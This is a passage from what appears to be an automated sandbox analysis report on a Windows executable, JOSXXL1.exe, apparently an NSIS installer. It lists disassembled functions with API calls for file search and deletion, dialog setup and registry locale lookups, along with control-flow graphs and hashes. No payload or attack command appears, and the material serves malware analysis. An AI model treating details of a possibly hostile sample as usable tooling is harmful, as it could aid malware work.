                                                                                                        • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,?,00405319,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000), ref: 00406268
                                                                                                        • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004062E6
                                                                                                        • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004062F9
                                                                                                        • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406335
                                                                                                        • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406343
                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0040634E
                                                                                                        • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406372
                                                                                                        • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,?,00405319,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000), ref: 004063CC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                        • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                        • API String ID: 900638850-2531536127
                                                                                                        • Opcode ID: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
                                                                                                        • Instruction ID: 0f73e779dd6c4db66e797802c36dad016b528f10de9f6072c808280cb7245e7c
                                                                                                        • Opcode Fuzzy Hash: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
                                                                                                        • Instruction Fuzzy Hash: 9361F271A00105EBDB209F25CD41AAE37A5AF50314F16807FFD46BA2D0D73D89A2CB9D
                                                                                                        Function 00405974 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 496 405974-40599a call 405c3f 499 4059b3-4059ba 496->499 500 40599c-4059ae DeleteFileW 496->500 502 4059bc-4059be 499->502 503 4059cd-4059dd call 406183 499->503 501 405b30-405b34 500->501 504 4059c4-4059c7 502->504 505 405ade-405ae3 502->505 511 4059ec-4059ed call 405b83 503->511 512 4059df-4059ea lstrcatW 503->512 504->503 504->505 505->501 508 405ae5-405ae8 505->508 509 405af2-405afa call 4064c6 508->509 510 405aea-405af0 508->510 509->501 520 405afc-405b10 call 405b37 call 40592c 509->520 510->501 514 4059f2-4059f6 511->514 512->514 516 405a02-405a08 lstrcatW 514->516 517 4059f8-405a00 514->517 519 405a0d-405a29 lstrlenW FindFirstFileW 516->519 517->516 517->519 521 405ad3-405ad7 519->521 522 405a2f-405a37 519->522 536 405b12-405b15 520->536 537 405b28-405b2b call 4052e2 520->537 521->505 527 405ad9 521->527 524 405a57-405a6b call 406183 522->524 525 405a39-405a41 522->525 538 405a82-405a8d call 40592c 524->538 539 405a6d-405a75 524->539 528 405a43-405a4b 525->528 529 405ab6-405ac6 FindNextFileW 525->529 527->505 528->524 532 405a4d-405a55 528->532 529->522 535 405acc-405acd FindClose 529->535 532->524 532->529 535->521 536->510 541 405b17-405b26 call 4052e2 call 406024 536->541 537->501 547 405aae-405ab1 call 4052e2 538->547 548 405a8f-405a92 538->548 539->529 542 405a77-405a80 call 405974 539->542 541->501 542->529 547->529 551 405a94-405aa4 call 4052e2 call 406024 548->551 552 405aa6-405aac 548->552 551->529 552->529
                                                                                                        APIs
                                                                                                        • DeleteFileW.KERNELBASE(?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 0040599D
                                                                                                        • lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 004059E5
                                                                                                        • lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00405A08
                                                                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00405A0E
                                                                                                        • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00405A1E
                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,0000002E), ref: 00405ABE
                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405ACD
                                                                                                        Strings
                                                                                                        • "C:\Users\user\Desktop\JOSXXL1.exe", xrefs: 0040597D
                                                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405A5E
                                                                                                        • \*.*, xrefs: 004059DF
                                                                                                        • PWB, xrefs: 004059CD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                        • String ID: "C:\Users\user\Desktop\JOSXXL1.exe"$Error writing temporary file. Make sure your temp folder is valid.$PWB$\*.*
                                                                                                        • API String ID: 2035342205-1255635639
                                                                                                        • Opcode ID: b88ea9f3819749435121edc00aa0cbde52c08bbffeef75bbb38eec1dc687fba1
                                                                                                        • Instruction ID: d49c34b76256c1d29f4337415f4183e275b3e80d30968624801757685f99445f
                                                                                                        • Opcode Fuzzy Hash: b88ea9f3819749435121edc00aa0cbde52c08bbffeef75bbb38eec1dc687fba1
                                                                                                        • Instruction Fuzzy Hash: E041B130A00A14EADB21AB618D89BAF7778DF41764F20427FF805B51D2D77C5982CE6E
                                                                                                        Function 00406847 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
                                                                                                        • Instruction ID: 5555e847f210990d4306c473702a26b4278c0affe79ec1256b97cb42bd71170f
                                                                                                        • Opcode Fuzzy Hash: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
                                                                                                        • Instruction Fuzzy Hash: 60F17671D04229CBCF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7785A86CF45
                                                                                                        Function 004064C6 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNELBASE(74DF3420,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405994,?,74DF3420,74DF2EE0), ref: 004064D1
                                                                                                        • FindClose.KERNEL32(00000000), ref: 004064DD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                        • String ID:
                                                                                                        • API String ID: 2295610775-0
                                                                                                        • Opcode ID: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
                                                                                                        • Instruction ID: 6f39d47423a9e3911ec825e8889a8cd4e4dbe9a09c05077791626206cca478a1
                                                                                                        • Opcode Fuzzy Hash: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
                                                                                                        • Instruction Fuzzy Hash: FED012715151209BC2901B787F0C85B7A989F553317128E36F46AF22E0C738CC67869C
                                                                                                        Function 00403D6F Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345windowstringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 186 403d6f-403d81 187 403ec2-403ed1 186->187 188 403d87-403d8d 186->188 190 403f20-403f35 187->190 191 403ed3-403f1b GetDlgItem * 2 call 404247 SetClassLongW call 40140b 187->191 188->187 189 403d93-403d9c 188->189 195 403db1-403db4 189->195 196 403d9e-403dab SetWindowPos 189->196 193 403f75-403f7a call 404293 190->193 194 403f37-403f3a 190->194 191->190 208 403f7f-403f9a 193->208 200 403f3c-403f47 call 401389 194->200 201 403f6d-403f6f 194->201 197 403db6-403dc8 ShowWindow 195->197 198 403dce-403dd4 195->198 196->195 197->198 203 403df0-403df3 198->203 204 403dd6-403deb DestroyWindow 198->204 200->201 221 403f49-403f68 SendMessageW 200->221 201->193 207 404214 201->207 212 403df5-403e01 SetWindowLongW 203->212 213 403e06-403e0c 203->213 210 4041f1-4041f7 204->210 209 404216-40421d 207->209 215 403fa3-403fa9 208->215 216 403f9c-403f9e call 40140b 208->216 210->207 222 4041f9-4041ff 210->222 212->209 219 403e12-403e23 GetDlgItem 213->219 220 403eaf-403ebd call 4042ae 213->220 217 4041d2-4041eb DestroyWindow EndDialog 215->217 218 403faf-403fba 215->218 216->215 217->210 218->217 224 403fc0-40400d call 4061a5 call 404247 * 3 GetDlgItem 218->224 225 403e42-403e45 219->225 226 403e25-403e3c SendMessageW IsWindowEnabled 219->226 220->209 221->209 222->207 228 404201-40420a ShowWindow 222->228 256 404017-404053 ShowWindow KiUserCallbackDispatcher call 404269 EnableWindow 224->256 257 40400f-404014 224->257 230 403e47-403e48 225->230 231 403e4a-403e4d 225->231 226->207 226->225 228->207 234 403e78-403e7d call 404220 230->234 235 403e5b-403e60 231->235 236 403e4f-403e55 231->236 234->220 239 403e96-403ea9 SendMessageW 235->239 241 403e62-403e68 235->241 236->239 240 403e57-403e59 236->240 239->220 240->234 244 403e6a-403e70 call 40140b 241->244 245 403e7f-403e88 call 40140b 241->245 252 403e76 244->252 245->220 254 403e8a-403e94 245->254 252->234 254->252 260 404055-404056 256->260 261 404058 256->261 257->256 262 40405a-404088 GetSystemMenu EnableMenuItem SendMessageW 260->262 261->262 263 40408a-40409b SendMessageW 262->263 264 40409d 262->264 265 4040a3-4040e1 call 40427c call 406183 lstrlenW call 4061a5 SetWindowTextW call 401389 263->265 264->265 265->208 274 4040e7-4040e9 265->274 274->208 275 4040ef-4040f3 274->275 276 404112-404126 DestroyWindow 275->276 277 4040f5-4040fb 275->277 276->210 279 40412c-404159 CreateDialogParamW 276->279 277->207 278 404101-404107 277->278 278->208 280 40410d 278->280 279->210 281 40415f-4041b6 call 404247 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 279->281 280->207 281->207 286 4041b8-4041cb ShowWindow call 404293 281->286 288 4041d0 286->288 288->210
                                                                                                        APIs
                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DAB
                                                                                                        • ShowWindow.USER32(?), ref: 00403DC8
                                                                                                        • DestroyWindow.USER32 ref: 00403DDC
                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF8
                                                                                                        • GetDlgItem.USER32(?,?), ref: 00403E19
                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E2D
                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403E34
                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403EE2
                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403EEC
                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00403F06
                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F57
                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403FFD
                                                                                                        • ShowWindow.USER32(00000000,?), ref: 0040401E
                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404030
                                                                                                        • EnableWindow.USER32(?,?), ref: 0040404B
                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404061
                                                                                                        • EnableMenuItem.USER32(00000000), ref: 00404068
                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404080
                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404093
                                                                                                        • lstrlenW.KERNEL32(00423748,?,00423748,00429260), ref: 004040BC
                                                                                                        • SetWindowTextW.USER32(?,00423748), ref: 004040D0
                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00404204
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                        • String ID: H7B$\d
                                                                                                        • API String ID: 3282139019-3853218712
                                                                                                        • Opcode ID: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
                                                                                                        • Instruction ID: 25c141fc174ea51021f963d75397c5770897fb54822066ed0df1b6b59a0401a8
                                                                                                        • Opcode Fuzzy Hash: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
                                                                                                        • Instruction Fuzzy Hash: EFC1CFB1644200FBDB216F61EE84D2B7B78EB98745F40097EF641B51F0CB3998529B2E
                                                                                                        Function 004039CC Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 289 4039cc-4039e4 call 406559 292 4039e6-4039f6 call 4060ca 289->292 293 4039f8-403a2f call 406050 289->293 302 403a52-403a7b call 403ca2 call 405c3f 292->302 298 403a31-403a42 call 406050 293->298 299 403a47-403a4d lstrcatW 293->299 298->299 299->302 307 403a81-403a86 302->307 308 403b0d-403b15 call 405c3f 302->308 307->308 309 403a8c-403ab4 call 406050 307->309 314 403b23-403b48 LoadImageW 308->314 315 403b17-403b1e call 4061a5 308->315 309->308 316 403ab6-403aba 309->316 318 403bc9-403bd1 call 40140b 314->318 319 403b4a-403b7a RegisterClassW 314->319 315->314 320 403acc-403ad8 lstrlenW 316->320 321 403abc-403ac9 call 405b64 316->321 330 403bd3-403bd6 318->330 331 403bdb-403be6 call 403ca2 318->331 322 403b80-403bc4 SystemParametersInfoW CreateWindowExW 319->322 323 403c98 319->323 328 403b00-403b08 call 405b37 call 406183 320->328 329 403ada-403ae8 lstrcmpiW 320->329 321->320 322->318 327 403c9a-403ca1 323->327 328->308 329->328 334 403aea-403af4 GetFileAttributesW 329->334 330->327 342 403bec-403c06 ShowWindow call 4064ed 331->342 343 403c6f-403c70 call 4053b5 331->343 337 403af6-403af8 334->337 338 403afa-403afb call 405b83 334->338 337->328 337->338 338->328 350 403c12-403c24 GetClassInfoW 342->350 351 403c08-403c0d call 4064ed 342->351 346 403c75-403c77 343->346 348 403c91-403c93 call 40140b 346->348 349 403c79-403c7f 346->349 348->323 349->330 352 403c85-403c8c call 40140b 349->352 355 403c26-403c36 GetClassInfoW RegisterClassW 350->355 356 403c3c-403c5f DialogBoxParamW call 40140b 350->356 351->350 352->330 355->356 360 403c64-403c6d call 40391c 356->360 360->327
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
                                                                                                          • Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586
                                                                                                        • lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00403A4D
                                                                                                        • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\indvandrings\attraavrdig,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74DF3420), ref: 00403ACD
                                                                                                        • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\indvandrings\attraavrdig,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403AE0
                                                                                                        • GetFileAttributesW.KERNEL32(Call), ref: 00403AEB
                                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\indvandrings\attraavrdig), ref: 00403B34
                                                                                                          • Part of subcall function 004060CA: wsprintfW.USER32 ref: 004060D7
                                                                                                        • RegisterClassW.USER32(00429200), ref: 00403B71
                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B89
                                                                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BBE
                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403BF4
                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403C20
                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403C2D
                                                                                                        • RegisterClassW.USER32(00429200), ref: 00403C36
                                                                                                        • DialogBoxParamW.USER32(?,00000000,00403D6F,00000000), ref: 00403C55
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                        • String ID: "C:\Users\user\Desktop\JOSXXL1.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\indvandrings\attraavrdig$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                        • API String ID: 1975747703-2416535552
                                                                                                        • Opcode ID: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
                                                                                                        • Instruction ID: 56c0b88d72ef28cc24ab3b3da6b812fbe5e4610ed82a7e8ff487d4c0aa16eca4
                                                                                                        • Opcode Fuzzy Hash: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
                                                                                                        • Instruction Fuzzy Hash: E261C270240600BAD720AF66AD45F2B3A7CEB84B09F40447EF945B22E2DB7D69118A3D
                                                                                                        Function 00402E41 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
